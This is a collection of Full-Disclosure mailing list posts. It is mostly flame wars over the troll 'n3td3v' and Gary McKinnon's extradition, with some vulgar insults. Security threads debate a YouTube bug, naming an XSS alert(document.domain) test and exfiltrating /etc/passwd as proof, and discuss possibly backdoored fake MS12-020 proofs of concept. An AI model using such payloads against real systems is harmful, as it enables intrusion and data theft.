Re: [Full-disclosure] [SPAM] [Bayesian][bayesTestMode] Re: Google vulnerabilities with PoC
LOL. boy oh boy you would have HATED the N3td3v years then... I'm sure your delete key works doesn't it? From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thomas Williams Sent: Saturday, March 15, 2014 10:44 AM To: Mario Vilas Cc: full-disclosure@lists.grok.org.uk; M Kirschbaum Subject: Re: [Full-disclosure] [SPAM] [Bayesian][bayesTestMode] Re: Google vulnerabilities with PoC I signed onto this mailing list as an interested person in security - not to see everyone moan. We will all have differences in opinion and we should all respect that. This goes for everyone and I feel I speak for a lot of people here, everyone needs to grow up, and shut up. Email scanned and verified safe. On 15 Mar 2014, at 13:43, Mario Vilas mvi...@gmail.com wrote: Sockpuppet much? On Sat, Mar 15, 2014 at 2:35 PM, M Kirschbaum pr...@yahoo.co.uk wrote: Gynvael Coldwind, What Alfred has reiterated is that this is a security vulnerability irrelevantly of whether it qualifies for credit. It is an unusual one, but still a security vulnerability. Anyone who says otherwise is blind, has little or no experience in hands on security, or either has a different agenda. The obvious here is that Google dismissed it as a non-security issue which I find rather sad and somewhat ridiculous. Even if we asked Andrew Tanenbaum about ,I suspect his answers wouldn't be much different. Rgds, On Saturday, 15 March 2014, 12:45, Gynvael Coldwind gynv...@coldwind.pl wrote: Hey, I think the discussion digressed a little from the topic. Let's try to steer it back on it. What would make this a security vulnerability is one of the three standard outcomes: - information leak - i.e. leaking sensitive information that you normally do not have access to - remote code execution - in this case it would be: -- XSS - i.e. executing attacker provided JS/etc code in another user's browser, in the context *of a sensitive, non-sandboxed* domain (e.g. youtube.com http://youtube.com/ ) -- server-side code execution - i.e. executing attacker provided code on the youtube servers - denial of service - I think we all agree this bug doesn't increase the chance of a DoS; since you upload files that fail to be processed (so the CPU-consuming re-encoding is never run) I would argue that this decreases the chance of DoS if anything Which leaves us with the aforementioned RCE. I think we all agree that if Mr. Lemonias presents a PoC that uses the functionality he discovered to, either: (A) display a standard XSS alert(document.domain) in a sensitive domain (i.e. *.youtube.com http://youtube.com/ or *.google.com http://google.com/ , etc) for a different (test) user OR (B) execute code to fetch the standard /etc/passwd file from the youtube server and send it to him, then we will be convinced that this is vulnerability and will be satisfied by the presented proof. I think that further discussion without this proof is not leading anywhere. One more note - in the discussion I noticed some arguments were tried to be justified or backed by saying I am this this and that, and have this many years of experience, e.g. (the first one I could find): have worked for Lumension as a security consultant for more than a decade. Please note, that neither experience, nor job title, proves exploitability of a *potential* bug. Working exploits do. That's it from me. I'm looking forward to seeing the RCE exploits (be it client or server side). Kind regards, Gynvael Coldwind -- There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ms12-020 PoC
Is that the same code from yesterday? I thought that code was a fake and didn'kt do anything? Anyone confirm this? Exibar Sent via BlackBerry by ATT -Original Message- From: kyle kemmerer krkemme...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 16 Mar 2012 12:01:16 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] ms12-020 PoC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ms12-020 PoC
Yah, I see the same about the binaryninjas version... That's the one I'll concentrate on.. Thanks! Sent via BlackBerry by ATT -Original Message- From: Chris L inchcom...@gmail.com Date: Fri, 16 Mar 2012 11:32:59 To: exi...@thelair.com Cc: kyle kemmererkrkemme...@gmail.com; full-disclosure-boun...@lists.grok.org.uk; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ms12-020 PoC That is the first time I've seen that specific one, so not sure if it is fake or not. The main one that I saw going around about 12 hours ago was this one: http://pastebin.com/fFWkezQH and it is the allegedly fake one. The fake that is was supposedly from s...@fbi.com kind of sent off some alarm bells right away. That is either someone trying to be funny or trying to trick some scripties into running something they really shouldn't by using a recognizable name. I've seen the BinaryNinja's one being talked about in a few different places now and the consensus seems to be that it is legit but that at the moment all it does is blue screen of death any vulnerable Windows machine that it is used against. I haven't seen any that actually have payloads yet. That said, I'm just passing on what seems to be the general consensus I've seen so far. I haven't had the chance to test out any of them yet as I don't have a spare windows box set up right now. I'm waiting for a working version to come out before I actually try to go through the shellcode for any backdoors and test it because who knows what some of these fakes might REALLY do. On Fri, Mar 16, 2012 at 10:50 AM, Exibar exi...@thelair.com wrote: Is that the same code from yesterday? I thought that code was a fake and didn'kt do anything? Anyone confirm this? Exibar Sent via BlackBerry by ATT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] n3td3v's Twitter account hacked
How would you know the difference between n3td3v spewing his usual crapola and anything that is now being spewed? Exibar -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of The Security Community Sent: Saturday, September 19, 2009 12:37 PM To: Full-Disclosure Subject: [inbox] [Full-disclosure] n3td3v's Twitter account hacked Someone evidently hacked into n3td3v's Twiiter account and is spewing nonsense. http://twitter.com/n3td3v Maybe it's some sort of botnet CC account now, I dunno. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Blonde moment for the list administrator
Yah, Blonde moment when he didnt' ban the idiot sooner... but obviously it hasn't done any good, as you're still here bothering us with your useless banter, aren't you n3td3v of many names Exibar - Original Message - From: full-censors...@hushmail.com To: full-disclosure@lists.grok.org.uk Sent: Friday, September 04, 2009 9:37 AM Subject: [Full-disclosure] Blonde moment for the list administrator i think john was having a blonde moment when he banned n3td3v. a momentary lapse in concentration, resulting in an embarrassing situation. we're supposed to be attracting hackers to the list not banning them. lawls ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] False statements made about security researcher n3td3v
That's ashame if he has bad bones perhaps if he drank more milk that would help. MY mom always said Drink milk, it builds strong bones. This statement just confused me, what are you trying to say here? let it be now don't pretend of him as a black hat for your entertainmentReally, what are you trying to say here? Exibar - Original Message - From: someone lawyer some...@lawyer.com To: Full-disclosure@lists.grok.org.uk Sent: Wednesday, August 19, 2009 1:00 AM Subject: Re: [Full-disclosure] False statements made about security researcher n3td3v List, My client setup a mailing list called n3td3v, he used the user n3td3v to spread the name of the user group so people would know it, since then you have ridiculed and tormented him, to the degree that he was so upset he had to be removed from your list. There was no need for you to do this to him he is a good guy, he has proved he has no bad bones in his body before he was removed. Why when he isn't any longer on your list you continue to want to believe he has bad bones in his body when everyone know he is a good guy? He can get argumentative when he feel need to defend himself when false statements are made, that don't make him bad. He a good guy in the information security world, let it be now don't pretend of him as a black hat for your entertainment purposes because people scanning through might not know it as a joke and you could cause damage toward my client. some...@lawyer.com - Original Message - From: valdis.kletni...@vt.edu To: Full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] False statements made about security researcher n3td3v Date: Tue, 18 Aug 2009 18:24:55 -0400 On Tue, 18 Aug 2009 15:52:36 CDT, someone lawyer said: What funny about my client be targeted by internet trolls? The self-referential aspects of the situation. 1.2.dat ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Be Yourself @ mail.com! Choose From 200+ Email Addresses Get a Free Account at www.mail.com! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ureleet is the Anti-Sec
oh good Lord, why wont this idiot just up and leave us already, he's obviously not wanted here This list was once useful If you are a real Lawyer, please identify yourself in public, with proper contact information. Of course, he's not a real lawyer, nor does he play one on TV. Hell, he barely has a 2nd grade command of the English language He's just yet another n3td3v troll post. and I fell right into it Exibar _ From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of someone lawyer Sent: Monday, August 10, 2009 11:49 PM To: Full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Ureleet is the Anti-Sec List, My client has asked me to study the list to make a case against them. some...@lawyer.com - Original Message - From: anti-scared- sheep To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Ureleet is the Anti-Sec Date: Mon, 10 Aug 2009 22:25:45 -0400 What's your problem list ? it's the same kid all the way, the ones who answer to this guy, should wonder how dumb he's. Dont pay attention to him, make a simple filter like *anti.*se.* and get back to work. He/They still get attention,and feel like he's/they're important because of you prick, so shut the hell up. They/he sucks, OK ?!? We got rid of n3td3v, plz dont make him feel like he's usefull by answering. 2009/8/10 anti...@hushmail.com Suck a dick bitch. On Mon, 10 Aug 2009 22:14:13 -0400 someone lawyer some...@lawyer.com wrote: List, No good you part of slanderous. (T Biehn Valdis Kletnieks) some...@lawyer.com - Original Message - From: valdis.kletni...@vt.edu To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Ureleet is the Anti-Sec Date: Mon, 10 Aug 2009 16:18:03 -0400 On Mon, 10 Aug 2009 12:07:24 EDT, T Biehn said: n3td3v, ureleet, and anti-sec are actually all Hitler, posting after being recently unfrozen from cryogenic sleep. Conclusion: Keeping your brain on ice for 60 years makes you stupid. Hitler was a lot smarter than that. (Crazy, yes, evil, yes - but would he have gotten as far as he did if he was only as smart as n3td3v and ureleet?) 1.2.dat ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Be Yourself @ mail.com! Choose From 200+ Email Addresses Get a Free Account at www.mail.com! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Be Yourself @ mail.com Choose From 200+ Email Addresses Get a Free Account at www.mail.com! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Marcus J. Ranum on PaulDotCom Episode 133
he's excited because he's mentioned in that episode Exibar -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: Friday, December 12, 2008 11:33 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Marcus J. Ranum on PaulDotCom Episode 133 On Sat, 13 Dec 2008 03:01:48 GMT, n3td3v said: An interesting episode of PaulDotCom Security Weekly This was the same PaulDotCom that you were whining about recently? Let me guess - this episode is even *more* over the top of the same stuff you complained about last time... *yawn* Move along, nothing to see. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Security predictions for 2009
I wish I was. But I DO have quite a few of them left, that is after that hot babe threw two of them on her boobs and wore them as a bikini top for a while They weren't even for sale, they were GIVING THEM AWAY... a whole roll of them, must have been over a thousand. tons of people grabbing a bunch off the roll ROFL Exibar -Original Message- From: n3td3v [mailto:[EMAIL PROTECTED] Sent: Saturday, December 06, 2008 7:01 AM To: Exibar Subject: [inbox] Re: [Full-disclosure] Security predictions for 2009 Ah, so you were the guy behind the stickers? On Fri, Dec 5, 2008 at 8:29 PM, Exibar [EMAIL PROTECTED] wrote: yes, he should loose the name, and the attitude that he's the last word and GOD in Informaiton Security agreed, if he goes away for 6 - 12 months, and comes back without the attitude and name there will no longer be N3TD3V SUX stickers at 'con. Exibar - Original Message - From: [EMAIL PROTECTED] To: n3td3v [EMAIL PROTECTED] Cc: Exibar [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Friday, December 05, 2008 1:31 PM Subject: Re: [Full-disclosure] Security predictions for 2009 On Fri, 05 Dec 2008 18:23:32 GMT, n3td3v said: I'm not a troll I wanted your security predictions, its people like you botching the list up not me. The basic problem is that you've *been* either a blithering idiot or a troll for so long, that even if something sensible *does* get posted from n3td3v, people will tend to label it as oh, his trolling has just gotten a bit better. Your best bet is to just toss that e-mail address, go pursue an outdoor hobby for 4 to 6 months, and use a different persona when you return. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security predictions for 2009
My prediction is that n3td3v will remain and torment us more with his/their/its/her unwanted rubbish on this list and will never ever leave as was once promissed why am I feeding the troll? oh boy... Exibar - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, December 05, 2008 12:24 PM Subject: [Full-disclosure] Security predictions for 2009 We here at n3td3v would like to hear your security predictions for 2009. Last time Paul Ferguson said 2008 would be the year of web 2.0 bugs and web 2.0 worms, that turned out to be utter rubbish (He does work for Trend Micro afterall), but in true tradition, let's here some of your predictions that might turn out to be bullshit as well. n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security predictions for 2009
yes, he should loose the name, and the attitude that he's the last word and GOD in Informaiton Security agreed, if he goes away for 6 - 12 months, and comes back without the attitude and name there will no longer be N3TD3V SUX stickers at 'con. Exibar - Original Message - From: [EMAIL PROTECTED] To: n3td3v [EMAIL PROTECTED] Cc: Exibar [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Friday, December 05, 2008 1:31 PM Subject: Re: [Full-disclosure] Security predictions for 2009 On Fri, 05 Dec 2008 18:23:32 GMT, n3td3v said: I'm not a troll I wanted your security predictions, its people like you botching the list up not me. The basic problem is that you've *been* either a blithering idiot or a troll for so long, that even if something sensible *does* get posted from n3td3v, people will tend to label it as oh, his trolling has just gotten a bit better. Your best bet is to just toss that e-mail address, go pursue an outdoor hobby for 4 to 6 months, and use a different persona when you return. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses
wow, disabling files to run from the root of all drives would never, ever fly in a corporate environment. Although I do like the idea on stopping autorun malware, it would work... but oh the calls to the helpdesk! ;-) Simply disabling autorun is a much better solution. Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam Sent: Friday, November 21, 2008 11:58 AM To: n3td3v Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: [inbox] Re: [Full-disclosure] Fwd: Comment on: USB devices spreading viruses USB / FLOPPY are attractive means for virus/worm to propagate. Here is a workaround to stop a successful infection from happening (well ~99% of the time least) 1. if you dont use wscript.exe disable/rename it. 2. start menu control pannel administrative tools local security policy software restriction policy additional rules say if c:\ d:\ and e:\ are your fixed drives then right click additional rules create path rule and create path rule [DISALLOWED AS] c:\*.* d:\*.* e:\*.* // why let anything to execute from root of fixed drives. for all other drives (removable/non existing) from a - z do as a:\ b:\ f:\ g:\ and so on. Why let anything execute from removable drive unless you are 100% sure the pendrive is clean and from a trusted source only. always have file extension and hidden/protected system file to show by default from folder option. well this is it. From a personal experience i assure the above should be the BEST solution for this problem and a extra layer of defense if AV fails to detect it. thanks, -bipin On 11/21/08, n3td3v [EMAIL PROTECTED] wrote: -- Forwarded message -- From: n3td3v [EMAIL PROTECTED] Date: Fri, Nov 21, 2008 at 1:11 AM Subject: Comment on: USB devices spreading viruses To: n3td3v [EMAIL PROTECTED] by n3td3v November 20, 2008 5:08 PM PST Meanwhile, the U.S. Department of Defense has temporarily banned the use of thumb drives, CDs, and other removable storage devices because of the spread of the Agent.bzt virus... There is no security through obscurity. http://news.cnet.com/8618-1009_3-10104496.html?communityId=2114targetCommun ityId=2114blogId=83messageId=5043948tag=mncol;tback ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- x-no-archive: yes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Windows RPC MS08-067 FAQ document released
Dude, why do you have it in for Gadi so bad? Oh, I know, it's because he is making a damn good living at being a REAL security professional and you're not. And because he's actually making a real, honest to goodness contribution to Information security... Where are YOUR speaking engagements? Where is YOUR contribution to Information Security as a whole? What are YOUR credentials as a security professional? I'll make the answer easy for you... THERE AREN'T ANY!!! It takes more than calling yourself a security professional to be one. It's takes more than creating a mailing list on Google groups to be a security professional. All we see from you is banter and non-sense coming from you, all you do is bitch, bitch, bitch about everyone else that is actually making a contribution, a REAL contribution. At one point you promised that you would leave this mailing list... I think we all wish you would really do it... Oh yah, and take all your other email addresses that you have on here and unsubscribe them too... We're all tired of your non-sense Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Sunday, October 26, 2008 5:48 AM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Windows RPC MS08-067 FAQ document released On Sun, Oct 26, 2008 at 2:50 AM, rholgstad [EMAIL PROTECTED] wrote: does securiteam do anything technical if you think gadi evron is technical you need your head checked. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Paul Asadoorian of PaulDotCom Enterprises
_ From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Stephen Northcutt Sent: Friday, October 03, 2008 8:43 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Paul Asadoorian of PaulDotCom Enterprises From: Trevow Andrews [EMAIL PROTECTED] Date: Wed, Oct 1, 2008 at 11:59 AM Subject: [Full-disclosure] Paul Asadoorian of PaulDotCom Enterprises / Podcast is ridiculous To: full-disclosure@lists.grok.org.uk = = = Stephen Northcutt here. I tried a couple variations of Trevor Andrews and did not find such a person registered with the SANS NS2008 conference. ROFL!!! hehe, and I wasn't serious when I mentioned that you're not even at SANS... Looks like Northcutt called your bluff what's next, it turns out that you're really n3t3d3v too LOL Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to, hacker's, extradition to US
Look, Mckinnon broke into the computer systems. Under his own admission he ran scripts to help him do this. Some of those scripts crashed systems. He possibly deleted files and what-not in his travels, either willfully or not, doesn't really matter. He loaded software on those systems so he could get in AGAIN easier... AND he leaves a note threatening that he will do it again. All this on KNOWN government computer systems. He intentionally wanted to get into these systems to look for UFO crap. This goes way beyond just simply leaving a note stating that your door is unlocked. This is going into the unlocked car, putting in a remote control door opener, and threatening to re-enter the car again. He knew what he was doing, he knew who's machines he was doing it to, he was obviously going to keep doing it until caught by the sound of his message. He's a criminal, period. He should be properly tried in a court of law. The way the UK an dthe US law is written, that means extradited to the US for a trial. All the protesting or debating won't change the fact that he's a criminal. Plain and simple, deal with it His sentence will be based upon what comes up in court, and it hardly ever is the maximum. Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Monday, September 29, 2008 7:42 PM To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to, hacker's,extradition to US nobody could be so stupid to leave their car door unlocked, ::blush:: the u.s military did, then gary mckinnon left a note on their wind screen wiper to say, look guys, you left your door unlocked, maybe you should fix it. the u.s military come back to the car, and claim the inside of the car has been damaged, but no proof it was gary mckinnon who did it, when their were plenty other people who could have walked past the same car and done something to it. the u.s decide they can't prove it was gary mckinnon who did the damage, because all they've got is the note on the wind screen wiper saying, you left your door unlocked, maybe you should fix it. next we know, the kid is being extradited to the u.s on charges of carrying out the biggest car crime of all time, and they change the law to say, actually we don't need proof you caused the damage or that any damage existed, we're blaming you anyway. by the way, we're giving you 60 years and you're never going to see your friends and family ever again. On Mon, Sep 29, 2008 at 10:57 PM, Exibar [EMAIL PROTECTED] wrote: So you guys are saying that if I forget my keys in my car and the door unlocked that it's not a crime to steal my car? It's not a crime to NOT lock your house, but it's still a crime to open that door and take that big screen tv if you're not the owner... Doesn't matter if he willfully caused damage or not, he still caused that damage, he's still a criminal. The details will have to come out in court, and they will. Either in the US or in the UK, doesn't matter... He's a criminal, period... He should be treated as such... Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Monday, September 29, 2008 11:24 AM To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED] Subject: [inbox] Re: [Full-disclosure] Supporters urge halt to, hacker's,extradition to US I just think someone from the military should be in the dock as well!!! This wasn't a one sided security incident, sloppy admins were involved in the 'threat to national security' that Gary Mckinnon supposedly posed. The passwords on the systems weren't set, if it wasn't Gary Mckinnon it was going to be some other script kid who got in. I don't know why the military are making a big deal about what happened, when ultimately its their I.T security staff who were the main culprits of blame. Accoriding to Gary Mckinnon, there were lots of script kids in the systems at the same time as him, they just decided to pick him out of the crowd to make an example of the activity that was going on. This should be a non-issue that should have been delt with internally in the military, the I.T security staff blamed and the script kids left to go on their humble way. When the way of intrusion is this lame, and its obvious the blame is on the I.T security staff, then I don't think they should waste everyone's time herding one of the script kid across the atlantic, just to keep America's nation pride in tact. Geez fucking christ, it was totally the military's fault, there is no get out clause. On Mon, Sep 29, 2008 at 4:00 PM, Kyrian [EMAIL PROTECTED] wrote: Folks, Thanks to Exibar for the (likely) clarification. No issue in converting from metric, incidentally ;-) I will check out the links you provided this evening and make up my own mind
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to, hacker's, extradition to US
excuse me? You're attempt at insults are pointed wrongly. I've read the legal brief on his case, the UK documents on his case too, he's ADMITTED guilt. In my book that's enough to call him a criminal, he should be arrested and tried in a court of law to determine if that is a fact or not. It's up to his accusers to prove his guilt. He is not actually guilty until he is found to be guilty in the court of law. If they cannot prove he is guilty, he must walk a free man. Not to difficult to prove guilt when the accuser admits to what he's done He is completely innocent until found guilty... at least in the US, UK, and even Australia that is the way things are. Lets see what the Chinese would do to him if he did the same thing over then than over here. oh, to answer your question, YES, I'm an American, and proud of it Exibar _ From: Noel Butler [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 30, 2008 5:28 PM To: Exibar Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to,hacker's, extradition to US On Wed, 2008-10-01 at 00:03, Exibar wrote: Look, Mckinnon broke into the computer systems. Under his own admission he ran scripts to help him do this. Some of those scripts crashed systems. He possibly deleted files and what-not in his travels, either willfully or not, doesn't really matter. He loaded software on those systems so he could get in AGAIN easier... AND he leaves a note threatening that he will do it again. All this on KNOWN government computer systems. He intentionally wanted to get into these systems to look for UFO crap. This goes way beyond just simply leaving a note stating that your door is unlocked. This is going into the unlocked car, putting in a remote control door opener, and threatening to re-enter the car again. He knew what he was doing, he knew who's machines he was doing it to, he was obviously going to keep doing it until caught by the sound of his message. He's a criminal, period. He should be properly tried in a court of law. The way the UK an dthe US law is written, that means extradited to the US for a trial. All the protesting or debating won't change the fact that he's a criminal. Plain and simple, deal with it His sentence will be based upon what comes up in court, and it hardly ever is the maximum. I'm sorry, are you American? Are you a typical American? If so, you have just demonstrated why he should not be extradited, as you, as a typical American have him decided GUILTY already without seeing and hearing all the ACTUAL evidence. not just the rhetoric the politicians want the media to tell you about, so he has no chance of fair trial. http://lists.grok.org.uk/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Supporters urge haltto, hacker's, extradition to US
tons of dribble snipped He is completely innocent until found guilty... at least in the US, UK, and even Australia that is the way things are. You seem to be contradicting yourself here, but maybe a little bit of light is getting in. Nope, he is completely innocent until he is FOUND guilty by a court of law. Right now, there is fair evidence to bring him in for the crime committed. He is the prime suspect at this time for that crime. The details of his crime, his testimony, his accuser's testimony, and evidence both against and for him will be submitted. Based upon those facts that are presented he will either be found guilty or not guilty. If he's found guilty, he will be sentenced. That's the way the laws of our countries work. Lets see what the Chinese would do to him if he did the same thing over then than over here. China has changed a lot in recent times, I think you'd find he'd get a fair trial, and you wouldnt have ministers their saying he needs to fry sure, with a huge difference... During trial, you have to prove yourself innocent. HUGE difference there Oh and he'd be put to death in China for crimes against the state. So he'd literally be fighting for his life during a trial in China. End of conversation... this is getting fruitless... lets all just sit back and watch what happens Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to, hacker's, extradition to US
So you guys are saying that if I forget my keys in my car and the door unlocked that it's not a crime to steal my car? It's not a crime to NOT lock your house, but it's still a crime to open that door and take that big screen tv if you're not the owner... Doesn't matter if he willfully caused damage or not, he still caused that damage, he's still a criminal. The details will have to come out in court, and they will. Either in the US or in the UK, doesn't matter... He's a criminal, period... He should be treated as such... Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Monday, September 29, 2008 11:24 AM To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED] Subject: [inbox] Re: [Full-disclosure] Supporters urge halt to, hacker's,extradition to US I just think someone from the military should be in the dock as well!!! This wasn't a one sided security incident, sloppy admins were involved in the 'threat to national security' that Gary Mckinnon supposedly posed. The passwords on the systems weren't set, if it wasn't Gary Mckinnon it was going to be some other script kid who got in. I don't know why the military are making a big deal about what happened, when ultimately its their I.T security staff who were the main culprits of blame. Accoriding to Gary Mckinnon, there were lots of script kids in the systems at the same time as him, they just decided to pick him out of the crowd to make an example of the activity that was going on. This should be a non-issue that should have been delt with internally in the military, the I.T security staff blamed and the script kids left to go on their humble way. When the way of intrusion is this lame, and its obvious the blame is on the I.T security staff, then I don't think they should waste everyone's time herding one of the script kid across the atlantic, just to keep America's nation pride in tact. Geez fucking christ, it was totally the military's fault, there is no get out clause. On Mon, Sep 29, 2008 at 4:00 PM, Kyrian [EMAIL PROTECTED] wrote: Folks, Thanks to Exibar for the (likely) clarification. No issue in converting from metric, incidentally ;-) I will check out the links you provided this evening and make up my own mind. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker's, extradition to US
McKinnon did cause damage: The charges include one incident - shortly after the attacks on September 11 2001 - which brought down a network of 300 computers at the Earle naval weapons station. Another raid apparently left 2,000 government machines in Washington inoperable. http://www.guardian.co.uk/technology/2006/apr/28/hacking.security A message left by him on a system: As part of his quest he left this message on an Army computer in 2002: U.S. foreign policy is akin to government-sponsored terrorism these days It was not a mistake that there was a huge security stand down on September 11 last year ... I am SOLO. I will continue to disrupt at the highest levels. http://blog.wired.com/27bstroke6/2008/08/uk-hacker-gary.html (and many other sources with the same message) Sure sounds like a criminal that knows what he's doing, and is doing it willfully, doesn't it? Oh yah, and he's really only facing a fine and up to 10 years of prison time in the US... I guess things really are different translating to the metric system in the UK... http://www.fortlewismwr.com/Computer_Fraud_Abuse_Act.htm Wondering what the maximum term in the UK is for the same crime? Hold on to your seat... LIFE IN PRISON (see next paragraph) As the Divisional Court itself pointed out (at para 34), the gravity of the offences alleged against the appellant should not be understated: the equivalent domestic offences include an offence under section 12 of the Aviation and Maritime Security Act 1990 for which the maximum sentence is life imprisonment. 